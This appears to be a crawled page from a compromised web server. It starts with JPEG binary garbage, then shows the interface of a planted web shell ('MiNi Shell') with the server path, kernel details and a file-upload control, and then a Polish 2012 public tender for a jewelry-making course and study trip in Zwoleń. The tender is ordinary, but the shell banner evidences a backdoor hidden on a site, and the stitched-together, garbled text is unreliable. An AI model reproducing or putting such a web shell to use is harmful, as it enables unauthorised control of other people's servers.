JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120907/336440-N-2012.html

<p class="kh_header"><b>Zwoleń: Zorganizowanie i przeprowadzenie kursu rękodzieła  - wytwarzanie sztucznej  biżuterii  oraz 3 dniowego wyjazdu studyjnego do gospodarstwa agroturystycznego  dla  uczestników projektu systemowego Uwierz w swoje możliwości realizowanego przez Miejski Ośrodek Pomocy Społecznej w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji</b><br>
<b>Numer ogłoszenia: 336440 - 2012; data zamieszczenia: 07.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Lubelska 6, 26-700 Zwoleń, woj. mazowieckie, tel. 48 676 23 30, faks 48 676 23 30.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie kursu rękodzieła  - wytwarzanie sztucznej  biżuterii  oraz 3 dniowego wyjazdu studyjnego do gospodarstwa agroturystycznego  dla  uczestników projektu systemowego Uwierz w swoje możliwości realizowanego przez Miejski Ośrodek Pomocy Społecznej w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie kursu w formie warsztatowej z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii oraz zorganizowanie i przeprowadzenie 3 dniowego wyjazdu studyjnego   do gospodarstwa agroturystycznego dla  uczestniczek projektu systemowego Uwierz w swoje możliwości realizowanego przez Miejski Ośrodek Pomocy Społecznej w Zwoleniu współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.
2. Zamawiający powyższe zamówienie podzielił na II części i dopuszcza składanie ofert częściowych. Wykonawca biorący udział w niniejszym postępowaniu może zrealizować całość zamówienia lub poszczególną jego część.
3. Część  I zamówienia - Zorganizowanie i przeprowadzenie kursu w formie warsztatowej z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii
4. Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie kursu w formie warsztatowej z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii dla 14 kobiet uczestniczek projektu systemowego Uwierz w swoje możliwości w wymiarze 30 godzin dydaktycznych (w tym: 5 godz. zajęć teoretycznych i 25 godz. zajęć warsztatowych - praktycznych)
5. Przeprowadzony kurs w połączeniu z umiejętnościami nabytymi na Treningu kompetencji życiowych, w którym zapoznano uczestniczki projektu z zasadami   przedsiębiorczości i małego marketingu, pokaże im jak sprzedawać własne wyroby i da im motywację się do otwarcia własnej działalności gospodarczej.
6.Zakres podmiotowy kursu obejmuje:
a)wprowadzenie w zagadnienia wytwarzania sztucznej biżuterii;
b)organizacja warsztatu prac i poszukiwania motywów;
c)klasyfikacja i omówienie tworzyw do wykonania biżuterii;
d)akcesoria niezbędne  do wykonywania ozdób;
e)elementy montażowe do wykonywania biżuterii;
f)ćwiczenia wykonywania biżuterii z metaloplastyki (broszki, kolczyki, naszyjniki, bransolety);
g)ćwiczenia wykonywania Eko-biżuterii (drewno, sznurek, skóra ekologiczna)
h)ćwiczenia wykonywania biżuterii z zastosowaniem filcu
Program kursu może być  rozszerzony o inne istotne zagadnienia w przedmiocie zamówienia.
7. Wykonawca zrealizuje kurs na terenie miasta Zwolenia a sala musi być wyposażona w odpowiednią ilość stanowisk (1 stanowisko dla max 2 osób) a każde stanowisko wyposażone w odpowiednią  ilość sprzętu, narzędzi, urządzeń i pomocy dydaktycznych właściwych do wykorzystania w trakcie prowadzenia kursu. Wykonawca zapewni uczestnikom półfabrykaty oraz konieczne materiały i narzędzia do wytwarzania biżuterii. Wykonane przez uczestników kursu w czasie zajęć przedmioty stanowić będą ich własność.
8. Wykonawca będzie zobowiązany do przeprowadzenia szkolenia stanowiskowego bhp dla uczestników rozpoczynających szkolenie.
9. Wykonawca zapewni uczestnikom materiały szkoleniowe odpowiadające programowi kursu (np. książki, skrypty itp.), które po zakończeniu szkolenia przechodzą na własność  jego uczestników;
10. Wykonawca przekaże Zamawiającemu komplet materiałów szkoleniowych do dokumentacji przed rozpoczęciem zajęć.
11. Wykonawca zapewnieni  bezpieczne i higieniczne warunki pracy i nauki, w tym sale szkoleniowe przestronne, odpowiednio oświetlone, wentylowane dostosowane do ilości uczestników kursu, odpowiednio wyposażone, spełniające wymogi bhp i przeciwpożarowe, z zapleczem socjalnym i sanitarnym.
12. Uczestnicy szkolenia musi mieć dostęp do wszelkich środków czystości tj.: papier toaletowy, mydło do rąk, ręczniki papierowe lub suszarka do rąk;
13. Zajęcia szkoleniowe powinny odbywać w dniach (od poniedziałku do piątku w godz. pomiędzy 8.00 - 15.00, uczestnikom przysługują 15 minutowe przerwy kawowe oraz jedna 30 min. przerwa z przeznaczeniem na obiad.
14. Kurs powinien być przeprowadzony przez osoby  posiadające kwalifikacje i doświadczenie w prowadzeniu zajęć objętych przedmiotem zamówienia.
15. W celu zapewnienia nadzoru wewnętrznego służącego podnoszeniu jakości szkolenia wymagane jest, aby Wykonawca wyznaczył osobę , która będzie sprawować stały, bezpośredni nadzór nad jakością realizowanego kursu oraz współpracować z Miejskim Ośrodkiem Pomocy Społecznej w Zwoleniu.
16.W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do
zapewnienia wyżywienia uczestnikom kursu w miejscu jego trwania w formie obiadu    
 - II danie + napój, oraz serwisu kawowego i  poczęstunku w  trakcie przerw  (kawa, sypana/rozpuszczalna, herbata, ciastka, woda gazowana i niegazowana, cukier, mleko, śmietanka do kawy) w każdym dniu szkolenia - dwie  przerwy kawowe. Ponadto   Wykonawca zapewni talerzyki jednorazowego użytku, kubki na napoje zimne i gorące również jednorazowego użytku, worki na śmieci oraz zobliguje uczestniczki projektu do pozostawienia w sali  ładu i porządku.
17. Wykonawca  ubezpieczy uczestników szkolenia od dnia rozpoczęcia szkolenia od następstw nieszczęśliwych wypadków  na czas trwania szkolenia i drogi na szkolenie oraz powrotnej, kserokopię polisy należy dostarczyć do zamawiającego najpóźniej na dwa dni przed planowanym rozpoczęciem szkolenia,  a w przypadku kiedy okres od podpisania umowy do rozpoczęcia szkolenia będzie krótszy to w dniu rozpoczęcia szkolenia.
18. Wykonawca będzie zobowiązany do sporządzenia protokołów okoliczności i przyczyn wypadku przez zespół powypadkowy w razie gdy taki wypadek zaistniał w trakcie szkolenia u osoby skierowanej, lub w trakcie przejazdu tych osób.
19. Wykonawca dokona zwrotu za przejazdy dla uczestniczek projektu z poza miasta Zwolenia (z miejsca zamieszkania  do miejsca przeprowadzenia szkolenia i z powrotem) dla 10  osób w granicach dojazdu od 5 - 30 km. Zamawiający zastrzega, że liczba dojeżdżających osób może ulec  zmianie.
20. Wykonawca zobowiązany będzie do prowadzenia dokumentacji potwierdzającej realizację usługi zgodnie z wymogami UE oraz dokumentacją POKL, w szczególności:
a)prowadzenia dziennej listy obecności uczestników kursu (potwierdzenie obecności za pomocą własnoręcznego czytelnego podpisu), a także rejestrowania i niezwłocznego zgłaszania Zamawiającemu najpóźniej w następnym dniu wszystkich nieobecności uczestników kursu, pod rygorem odmowy zapłaty za szkolenie tych osób;
b)odebrania od uczestników oświadczeń dotyczących odbioru materiałów szkoleniowych, oraz oświadczeń potwierdzających skorzystanie z wyżywienia, biletów komunikacji PKS;
c)prowadzenia dziennika zajęć zawierającego wymiar godzin i tematy zajęć, podpis wykładowcy lub prowadzonego ćwiczenia;
d)prowadzenie rejestru wydanych zaświadczeń, certyfikatów i materiałów;
e)prowadzenia dokumentacji zdjęciowej z zajęć
f)wydania Zamawiającemu kompletu oryginalnych zaświadczeń i kopii o ukończeniu kursu  przez uczestniczki, zawierającego w swojej treści minimum niżej wymienione elementy 
- pieczęć organizatora kursu;
- personalne dane osoby, która kurs ukończyła;
- termin realizacji kursu;
- miejscowość i daty wydania zaświadczenia;
- podpis i pieczęć osoby upoważnionej przez organizatora warsztatów do wydania zaświadczenia
- nazwę zajęć edukacyjnych oraz wymiar ich godzin;
21. Wykonawca zobowiązany będzie do przekazania Zamawiającemu, w terminie  do 7 dni od dnia zakończenia szkolenia, następujących dokumentów:
- faktury za przeprowadzoną usługę;
- imiennego wykazu osób, które ukończyły szkolenie;
- imiennego wykazu osób, które nie ukończyły szkolenia;
- oryginałów kserokopii wydanych zaświadczeń i certyfikatów potwierdzających ukończenie szkolenia;
-kserokopii dziennika zajęć;
- kserokopii list obecności;
- kserokopii protokołu z egzaminu;
- ankiet wstępnych, ewaluacyjnych i zbiorczych, dokumentacji zdjęciowej ze szkolenia;
- kserokopii oświadczeń uczestników potwierdzających odbiór materiałów dydaktycznych; odbioru wyżywienia/poczęstunku;
- innej dokumentacji niezbędnej do rozliczenia szkolenia na życzenie Zamawiającego
22. Wykonawca jest zobowiązany poddać się kontroli MOPS oraz innym uprawnionym osobom.
23. Oznakowania miejsc z których korzystać będą uczestnicy projektu (pokoje, sale konferencyjne itp.) poprzez umieszczenie plakatów informacyjnych dotyczących realizacji projektu oraz informacji o współfinansowaniu przez Unię Europejską i programu Kapitał Ludzki.
24. Podpisania stosownego upoważnienia do przetwarzania danych osobowych, przed rozpoczęciem szkolenia i anulowanie upoważnienia po zakończeniu szkolenia;
25. Przeprowadzić na zakończenie szkolenia badania ankietowe uczestników szkolenia dotyczące poziomu zawartości merytorycznej oraz jakości prowadzonych  zajęć, ankieta ta powinna  zawierać metryczkę (wzór ankiety należy załączyć celem zatwierdzenia przed podpisaniem umowy)
26. Wymagany termin realizacji:  październik - listopad, data zakończenia do 30.11.2012 r.

Część II zamówienia -  zorganizowanie i przeprowadzenie 3 dniowego wyjazdu studyjnego do gospodarstwa agroturystycznego w Górach Świętokrzyskich ze zwiedzaniem zabytków i walorów przyrody.
1.Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu 3 dniowego wyjazdu  studyjnego do gospodarstwa agroturystycznego  dla 16 osób (14 uczestniczek projektu i 2 pracowników  MOPS realizujących projekt) .
Wizyta w danym gospodarstwie ma na celu zapoznanie uczestników projektu ze     
specyfiką działalności w branży turystycznej, która może przyczynić się do aktywizacji   zawodowej i podjęcia inicjatyw w środowisku lokalnym.
2.Wykonawca powinien zaprezentować uczestnikom obiekt, zapoznać ich z codzienną pracą w danym miejscu, przedstawić atrakcję jakie ma w swojej ofercie, przybliżyć zasady funkcjonowania danego obiektu oraz specyfikę działalności w branży turystycznej.
3.Termin realizacji zamówienia  miesiąc październik 2012 roku (w dniach piątek, sobota, niedziela lub sobota, niedziela,  poniedziałek).
4.Miejsce wykonania zamówienia  Zwoleń.
Niniejsze zamówienie obejmuje;
5.Transport autokarowy uczestników ze Zwolenia do miejscowości, w której przewidziane jest zakwaterowanie  oraz przywóz do Zwolenia. Zamawiający wymaga aby transport  odbywał się w pojeździe wyposażonym w klimatyzację oraz system nagłośnienia.
6.Zakwaterowanie wszystkich uczestników w gospodarstwie agroturystycznym w pokojach 2, 3 lub 4 osobowych, każdy pokój z pełnym  węzłem sanitarnym   tj.: umywalka, prysznic, wc (z całodobowym dostępem do ciepłej i zimnej wody) wyposażonym TV satelitarną, czajnik  bezprzewodowy, szklanki, wodę mineralną, pokoje wyposażone w jednoosobowe  łóżka z pościelą,  (wyklucza się łóżka piętrowe), kosze na śmieci.  
7.Całodzienne wyżywienie dla uczestników, składające się z trzech posiłków: śniadania, obiad dwudaniowy z napojem, kolacji. Wykonawca zapewni prowiant na czas podróży do miejsca pobytu i w dniu powrotu (kanapki, napoje smakowe/soki, wodę mineralną gazowaną i niegazowaną, słodycze).
8.Ubezpieczenia NNW dla każdego uczestnika wyjazdu na czas przejazdów i pobytu w ośrodku. Wykonawca będzie zobowiązany do sporządzenia protokołów okoliczności i przyczyn wypadku przez zespół powypadkowy w razie gdy taki wypadek zaistniał w trakcie szkolenia u osoby skierowanej, lub w trakcie przewozu tych osób.
9.W razie potrzeby Wykonawca zapewni opiekę pielęgniarską lub lekarską polegającą na wezwaniu lekarza ośrodka lub dowiezienia uczestnika do przychodni/szpitala. Wszystkie koszty pomocy lekarskiej pokrywa Wykonawca
10.Uczestnikom   nieodpłatnie zapewnić  programy integracji społecznej w tym m.in. wieczorku zapoznawczego  z ogniskiem,  na którym przewidziano dania z rusztu (kiełbaski, kaszanki itp.), zwiedzanie okolicy:
- zamek w Chęcinach (klasztor Klarysek, lub dawny klasztor franciszkanów) spacer z przewodnikiem po mieście.
- jaskinia Raj, Kadzielnia, Jezioro Szmaragdowe, Łysa Góra, Sanktuarium na Św. Krzyżu, panorama Gołoborza
- w drodze powrotnej zwiedzanie muzeum wsi kieleckiej
11.Wykonawca będzie zobowiązany do przekazania Zamawiającemu stosownych dokumentów po zakończeniu wyjazdu niezbędnych przy realizacji projektu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0, 80.53.00.00-8, 63.51.10.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie Ocena spełnienia  warunku będzie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącym ZAŁ. Nr 2  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za  spełniony, jeżeli Wykonawca wykaże, że należycie wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w  okresie  ostatnich trzech lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie  co najmniej 2 usługi szkoleniowe z zakresu technik rękodzielniczych (np. warsztaty, kursy, szkolenia instruktażowe) dla min. 7 osób o wartości nie mniejszej niż 5 000,00 zł. brutto każda oraz   zorganizował i  przeprowadził  2 wyjazdy studyjne z programem integracyjno-edukacyjnym o wartości nie mniejszej niż 10 000,00 zł. brutto każdy,  z podaniem,  wartości, przedmiotu usługi, daty wykonania lub wykonywania, odbiorców wraz z dokumentami potwierdzającymi, że została wykonana należycie (referencje, protokoły odbioru).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie Ocena spełnienia  warunku będzie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącym ZAŁ. Nr 2  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część I zamówienia
Kurs z zakresu rękodzieła artystycznego - wytwarzanie sztucznej biżuterii
Min. 1 osoba posiadająca kwalifikacje lub umiejętności i co najmniej roczne doświadczenie odpowiednio: w prowadzeniu zajęć z zakresu tworzenia biżuterii, będącą instruktorem rękodzieła artystycznego, lub wykonywaniu zajęć w zakresie tworzenia biżuterii, będącą twórcą ludowym, rzemieślnikiem ludowym lub rękodzielnikiem tradycyjnym. 

Część II zamówienia
3 dniowy wyjazd studyjny z programem integracyjno-edukacyjnym
Zamawiający nie precyzuje szczególnych wymagań, warunek zostanie spełniony, jeżeli Wykonawca złoży oświadczenie na druku stanowiącym Zał. Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie Ocena spełnienia  warunku będzie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu stanowiącym ZAŁ. Nr 2  do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę9 przyjmuję się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich kopii dokumentów przetargowych za zgodność z oryginałem), o ile nie wynika z przepisów prawa lub innych dokumentów;
1. Oświadczenie o spełnieniu warunków udziału w postępowaniu Zał. Nr 2 do SIWZ.
2. Oświadczenie o poufności Zał. Nr 6 do SIWZ.
3. W przypadku osób fizycznych prowadzących działalność gospodarczą aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej,
4. Oświadczenie Wykonawcy, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia Zał. Nr 10.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
